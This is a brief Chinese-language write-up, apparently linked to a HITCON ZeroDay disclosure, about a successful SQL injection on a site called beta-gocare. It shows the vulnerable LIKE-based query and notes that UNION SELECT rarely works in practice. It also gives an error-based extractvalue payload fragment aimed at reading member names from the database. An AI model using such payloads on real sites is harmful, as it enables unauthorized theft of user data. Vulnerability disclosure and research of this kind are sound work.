SQL Injection beta-gocare Success
本文是 https://zeroday.hitcon.org/vulnerability/ZD-2025-01026 的延伸
原始 SQL 語法
SELECT * FROM (`product_file`) WHERE ( name like '% userInput %' OR content like '% userInput %' OR memo like '% userInput %' ) AND `display` = 'y' AND `sell_kind` > '0' AND `act_start` <= '2025-08-20' AND `act_end` >= '2025-08-20' LIMIT 12
學到的東西
UNION SELECT在實務上有點難成功extractvalue(1,concat(0x7e,(SELECT name FROM members LIMIT 0,1),如果members沒資料,整個 SQL 語法就不會噴錯(?)